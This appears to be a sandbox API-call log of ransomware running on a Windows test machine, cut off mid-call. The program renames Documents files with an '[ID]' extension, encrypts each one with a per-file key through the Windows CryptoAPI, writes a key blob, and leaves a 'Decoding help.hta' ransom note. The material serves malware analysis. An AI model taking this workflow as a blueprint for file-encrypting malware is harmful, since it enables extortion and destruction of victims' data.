out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IE2sk29TIgjPvTzVKz.pptx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IE2sk29TIgjPvTzVKz.pptx" [0046.187] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IE2sk29TIgjPvTzVKz.pptx" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IE2sk29TIgjPvTzVKz.pptx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IE2sk29TIgjPvTzVKz.pptx" [0046.187] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IE2sk29TIgjPvTzVKz.pptx", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IE2sk29TIgjPvTzVKz.pptx.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IE2sk29TIgjPvTzVKz.pptx.[ID]g9uZrLhJaygpwRm1[ID]" [0046.187] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IE2sk29TIgjPvTzVKz.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ie2sk29tigjpvtzvkz.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IE2sk29TIgjPvTzVKz.pptx.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ie2sk29tigjpvtzvkz.pptx.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.188] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IE2sk29TIgjPvTzVKz.pptx.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ie2sk29tigjpvtzvkz.pptx.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x49c [0046.188] CreateFileMappingA (hFile=0x49c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x624 [0046.188] CryptAcquireContextA (in: phProv=0x580fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x580fcec*=0x3448b60) returned 1 [0046.189] CryptGenKey (in: hProv=0x3448b60, Algid=0x6610, dwFlags=0x1, phKey=0x580fce8 | out: phKey=0x580fce8*=0x671af0) returned 1 [0046.189] CryptExportKey (in: hKey=0x671af0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x580fbe4, pdwDataLen=0x580fce4 | out: pbData=0x580fbe4*, pdwDataLen=0x580fce4*=0x2c) returned 1 [0046.189] MapViewOfFile (hFileMappingObject=0x624, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17920) returned 0x3240000 [0046.190] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x580fbe4*, pdwDataLen=0x580fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x580fbe4*, pdwDataLen=0x580fcf8*=0x100) returned 1 [0046.190] CryptEncrypt (in: hKey=0x671af0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3240000, pdwDataLen=0x580fce4*=0x17920, dwBufLen=0x17920 | out: pbData=0x3240000*, pdwDataLen=0x580fce4*=0x17920) returned 1 [0046.192] UnmapViewOfFile (lpBaseAddress=0x3240000) returned 1 [0046.194] CloseHandle (hObject=0x624) returned 1 [0046.194] CryptDestroyKey (hKey=0x671af0) returned 1 [0046.194] CryptReleaseContext (hProv=0x3448b60, dwFlags=0x0) returned 1 [0046.194] SetFilePointerEx (in: hFile=0x49c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.195] WriteFile (in: hFile=0x49c, lpBuffer=0x580fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x580fcf8, lpOverlapped=0x0 | out: lpBuffer=0x580fbe4*, lpNumberOfBytesWritten=0x580fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.195] WriteFile (in: hFile=0x49c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x580fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x580fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.195] CloseHandle (hObject=0x49c) returned 1 [0046.197] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IE2sk29TIgjPvTzVKz.pptx.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.197] FindNextFileW (in: hFindFile=0x5a59b0, lpFindFileData=0x580fd30 | out: lpFindFileData=0x580fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc307e780, ftCreationTime.dwHighDateTime=0x1d4b22b, ftLastAccessTime.dwLowDateTime=0x66f96280, ftLastAccessTime.dwHighDateTime=0x1d5233b, ftLastWriteTime.dwLowDateTime=0x66f96280, ftLastWriteTime.dwHighDateTime=0x1d5233b, nFileSizeHigh=0x0, nFileSizeLow=0xe7bd, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISB48ey.pptx", cAlternateFileName="ISB48E~1.PPT")) returned 1 [0046.197] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0046.197] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned 47 [0046.197] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Decoding help.hta" [0046.197] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\decoding help.hta")) returned 0x1 [0046.197] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ISB48ey.pptx") returned -1 [0046.197] lstrlenW (lpString="ISB48ey.pptx") returned 12 [0046.197] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0046.197] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned 47 [0046.197] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="ISB48ey.pptx" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ISB48ey.pptx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ISB48ey.pptx" [0046.197] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ISB48ey.pptx" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ISB48ey.pptx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ISB48ey.pptx" [0046.197] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ISB48ey.pptx", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ISB48ey.pptx.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ISB48ey.pptx.[ID]g9uZrLhJaygpwRm1[ID]" [0046.197] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ISB48ey.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\isb48ey.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ISB48ey.pptx.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\isb48ey.pptx.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ISB48ey.pptx.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\isb48ey.pptx.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x49c [0046.198] CreateFileMappingA (hFile=0x49c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x624 [0046.198] CryptAcquireContextA (in: phProv=0x580fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x580fcec*=0x3448b60) returned 1 [0046.199] CryptGenKey (in: hProv=0x3448b60, Algid=0x6610, dwFlags=0x1, phKey=0x580fce8 | out: phKey=0x580fce8*=0x671b30) returned 1 [0046.199] CryptExportKey (in: hKey=0x671b30, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x580fbe4, pdwDataLen=0x580fce4 | out: pbData=0x580fbe4*, pdwDataLen=0x580fce4*=0x2c) returned 1 [0046.199] MapViewOfFile (hFileMappingObject=0x624, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe7a0) returned 0x3240000 [0046.200] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x580fbe4*, pdwDataLen=0x580fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x580fbe4*, pdwDataLen=0x580fcf8*=0x100) returned 1 [0046.201] CryptEncrypt (in: hKey=0x671b30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3240000, pdwDataLen=0x580fce4*=0xe7a0, dwBufLen=0xe7a0 | out: pbData=0x3240000*, pdwDataLen=0x580fce4*=0xe7a0) returned 1 [0046.201] UnmapViewOfFile (lpBaseAddress=0x3240000) returned 1 [0046.203] CloseHandle (hObject=0x624) returned 1 [0046.203] CryptDestroyKey (hKey=0x671b30) returned 1 [0046.203] CryptReleaseContext (hProv=0x3448b60, dwFlags=0x0) returned 1 [0046.203] SetFilePointerEx (in: hFile=0x49c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.203] WriteFile (in: hFile=0x49c, lpBuffer=0x580fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x580fcf8, lpOverlapped=0x0 | out: lpBuffer=0x580fbe4*, lpNumberOfBytesWritten=0x580fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.204] WriteFile (in: hFile=0x49c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x580fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x580fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.204] CloseHandle (hObject=0x49c) returned 1 [0046.205] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ISB48ey.pptx.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.205] FindNextFileW (in: hFindFile=0x5a59b0, lpFindFileData=0x580fd30 | out: lpFindFileData=0x580fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0046.205] lstrcmpW (lpString1=".", lpString2="My Music") returned -1 [0046.205] lstrcmpW (lpString1="..", lpString2="My Music") returned -1 [0046.205] lstrcmpiW (lpString1="windows", lpString2="My Music") returned 1 [0046.206] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0046.206] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned 47 [0046.206] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Music" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music" [0046.206] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*.*" [0046.206] GlobalMemoryStatus (in: lpBuffer=0x580fd10 | out: lpBuffer=0x580fd10) [0046.206] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10f573e0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x49c [0046.281] CloseHandle (hObject=0x49c) returned 1 [0046.281] FindNextFileW (in: hFindFile=0x5a59b0, lpFindFileData=0x580fd30 | out: lpFindFileData=0x580fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0046.281] lstrcmpW (lpString1=".", lpString2="My Pictures") returned -1 [0046.282] lstrcmpW (lpString1="..", lpString2="My Pictures") returned -1 [0046.282] lstrcmpiW (lpString1="windows", lpString2="My Pictures") returned 1 [0046.282] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0046.282] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned 47 [0046.282] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Pictures" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures" [0046.282] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*.*" [0046.282] GlobalMemoryStatus (in: lpBuffer=0x580fd10 | out: lpBuffer=0x580fd10) [0046.282] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10c0e5f8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x49c [0046.328] CloseHandle (hObject=0x49c) returned 1 [0046.328] FindNextFileW (in: hFindFile=0x5a59b0, lpFindFileData=0x580fd30 | out: lpFindFileData=0x580fd30*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0046.328] lstrcmpW (lpString1=".", lpString2="My Shapes") returned -1 [0046.328] lstrcmpW (lpString1="..", lpString2="My Shapes") returned -1 [0046.328] lstrcmpiW (lpString1="windows", lpString2="My Shapes") returned 1 [0046.328] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0046.328] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned 47 [0046.328] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Shapes" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" [0046.328] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*" [0046.328] GlobalMemoryStatus (in: lpBuffer=0x580fd10 | out: lpBuffer=0x580fd10) [0046.328] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9732230, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x49c [0046.348] CloseHandle (hObject=0x49c) returned 1 [0046.348] FindNextFileW (in: hFindFile=0x5a59b0, lpFindFileData=0x580fd30 | out: lpFindFileData=0x580fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0046.348] lstrcmpW (lpString1=".", lpString2="My Videos") returned -1 [0046.348] lstrcmpW (lpString1="..", lpString2="My Videos") returned -1 [0046.348] lstrcmpiW (lpString1="windows", lpString2="My Videos") returned 1 [0046.348] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0046.348] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned 47 [0046.348] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Videos" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos" [0046.348] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*.*" [0046.348] GlobalMemoryStatus (in: lpBuffer=0x580fd10 | out: lpBuffer=0x580fd10) [0046.349] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10a9dfd8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x49c [0046.363] CloseHandle (hObject=0x49c) returned 1 [0046.363] FindNextFileW (in: hFindFile=0x5a59b0, lpFindFileData=0x580fd30 | out: lpFindFileData=0x580fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2192a170, ftCreationTime.dwHighDateTime=0x1d4ce45, ftLastAccessTime.dwLowDateTime=0x3720e5e0, ftLastAccessTime.dwHighDateTime=0x1d4c63b, ftLastWriteTime.dwLowDateTime=0x3720e5e0, ftLastWriteTime.dwHighDateTime=0x1d4c63b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NL8-Tp3LIG", cAlternateFileName="NL8-TP~1")) returned 1 [0046.363] lstrcmpW (lpString1=".", lpString2="NL8-Tp3LIG") returned -1 [0046.363] lstrcmpW (lpString1="..", lpString2="NL8-Tp3LIG") returned -1 [0046.363] lstrcmpiW (lpString1="windows", lpString2="NL8-Tp3LIG") returned 1 [0046.363] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0046.363] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned 47 [0046.363] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="NL8-Tp3LIG" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NL8-Tp3LIG") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NL8-Tp3LIG" [0046.363] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NL8-Tp3LIG", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NL8-Tp3LIG\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NL8-Tp3LIG\\*.*" [0046.364] GlobalMemoryStatus (in: lpBuffer=0x580fd10 | out: lpBuffer=0x580fd10) [0046.364] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x109106c8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x49c [0047.567] CloseHandle (hObject=0x49c) returned 1 [0047.567] FindNextFileW (in: hFindFile=0x5a59b0, lpFindFileData=0x580fd30 | out: lpFindFileData=0x580fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7574230, ftCreationTime.dwHighDateTime=0x1d4d02c, ftLastAccessTime.dwLowDateTime=0x5cbe320, ftLastAccessTime.dwHighDateTime=0x1d4f98d, ftLastWriteTime.dwLowDateTime=0x5cbe320, ftLastWriteTime.dwHighDateTime=0x1d4f98d, nFileSizeHigh=0x0, nFileSizeLow=0x21bd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OftyArbNR4uC28w.docx", cAlternateFileName="OFTYAR~1.DOC")) returned 1 [0049.117] lstrcpyW (in: lpString1=0x989a7f8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0049.117] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned 47 [0049.117] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Decoding help.hta" [0049.117] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\decoding help.hta")) returned 0x1 [0049.117] lstrcmpiW (lpString1="Decoding help.hta", lpString2="OftyArbNR4uC28w.docx") returned -1 [0049.117] lstrlenW (lpString="OftyArbNR4uC28w.docx") returned 20 [0049.117] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0049.117] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned 47 [0049.117] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="OftyArbNR4uC28w.docx" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OftyArbNR4uC28w.docx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OftyArbNR4uC28w.docx" [0049.117] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OftyArbNR4uC28w.docx" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OftyArbNR4uC28w.docx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OftyArbNR4uC28w.docx" [0049.118] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OftyArbNR4uC28w.docx", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OftyArbNR4uC28w.docx.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OftyArbNR4uC28w.docx.[ID]g9uZrLhJaygpwRm1[ID]" [0049.118] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OftyArbNR4uC28w.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\oftyarbnr4uc28w.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OftyArbNR4uC28w.docx.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\oftyarbnr4uc28w.docx.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0052.060] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 